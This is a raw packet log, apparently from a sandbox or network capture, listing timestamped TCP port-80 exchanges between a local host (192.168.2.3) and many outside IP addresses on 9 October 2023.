                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.744299889 CEST804976513.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.744431973 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.746052027 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.775396109 CEST8049763208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.785437107 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.824120045 CEST8049766165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.829637051 CEST4976680192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.829691887 CEST4976680192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.908771992 CEST804976513.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.909149885 CEST804976513.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.909208059 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.934000969 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.935379982 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.948158026 CEST8049768104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.948307991 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.948658943 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.985898972 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.985928059 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.985970020 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.986013889 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.986023903 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.986061096 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.000206947 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.000968933 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.001061916 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.001422882 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.071785927 CEST8049766165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.072679043 CEST8049766165.227.252.190192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.072778940 CEST4976680192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.098531008 CEST804976513.33.21.22192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.101747990 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.111249924 CEST8049768104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.123291016 CEST8049768104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.125309944 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.163867950 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.258961916 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.259190083 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.259336948 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.293533087 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.293634892 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301769018 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301784039 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301826000 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301829100 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301840067 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301848888 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301860094 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301878929 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301913977 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.301949978 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.317318916 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.330081940 CEST8049768104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.330095053 CEST804977081.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.330168009 CEST4976880192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.330210924 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373331070 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373358965 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373378038 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373395920 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373398066 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373418093 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.373454094 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.381752014 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.398987055 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399003983 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399022102 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399048090 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399063110 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399077892 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399084091 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399091959 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399120092 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.399141073 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.401627064 CEST4977180192.168.2.3198.100.146.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.584089041 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616296053 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616383076 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616694927 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616712093 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616749048 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.616770983 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630664110 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630732059 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630754948 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630816936 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630842924 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630841017 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630893946 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.630963087 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631017923 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631052017 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631098032 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631143093 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631184101 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631189108 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631233931 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631275892 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631314039 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631328106 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.631355047 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689754009 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689780951 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689789057 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689798117 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689805984 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689814091 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689820051 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.689831018 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.690036058 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.690036058 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.711611032 CEST804977081.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715060949 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715076923 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715245962 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715337992 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715364933 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715378046 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715393066 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715404987 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715418100 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715420961 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715432882 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715440989 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715533018 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715533018 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715533018 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715595961 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715610981 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.715663910 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.724895000 CEST804977081.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.725440025 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.752545118 CEST4977080192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.782711029 CEST4977380192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.875765085 CEST8049744108.167.164.216192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.875854969 CEST4974480192.168.2.3108.167.164.216
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932049036 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932071924 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932085037 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932199001 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932328939 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.932370901 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.944521904 CEST8049772213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.944626093 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.948995113 CEST4977280192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955557108 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955619097 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955672979 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955734968 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955723047 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955775023 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955795050 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955797911 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955840111 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955862045 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955905914 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955905914 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955936909 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955945969 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955966949 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955977917 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.955996990 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956007004 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956063032 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956070900 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956094027 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956099033 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956156969 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956162930 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956187963 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956193924 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956218004 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956227064 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956248045 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956254959 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956278086 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956279993 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956306934 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956314087 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956338882 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956353903 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956368923 CEST8049769193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956373930 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.956407070 CEST4976980192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006117105 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006179094 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006220102 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006232977 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006249905 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006257057 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006266117 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006270885 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006277084 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006287098 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006289959 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006298065 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006306887 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006309986 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006321907 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006340981 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006359100 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006373882 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006408930 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006422997 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006458044 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006464958 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006468058 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006484985 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006494999 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006504059 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006517887 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006522894 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.006542921 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.031824112 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.031949043 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032027960 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032074928 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032087088 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032125950 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032522917 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032574892 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032685041 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032726049 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032789946 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032829046 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032927990 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.032967091 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033062935 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033102989 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033210993 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033251047 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033363104 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033401012 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033437014 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033473969 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033524036 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033559084 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033610106 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033651114 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033885002 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033932924 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.033977985 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034017086 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034111023 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034148932 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034231901 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034270048 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034578085 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034635067 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034642935 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034681082 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034730911 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034766912 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034784079 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.034821033 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035003901 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035095930 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035099983 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035166025 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035258055 CEST8049767217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.035342932 CEST4976780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.055819988 CEST8049773162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.055910110 CEST4977380192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.077723980 CEST4977380192.168.2.3162.43.120.128
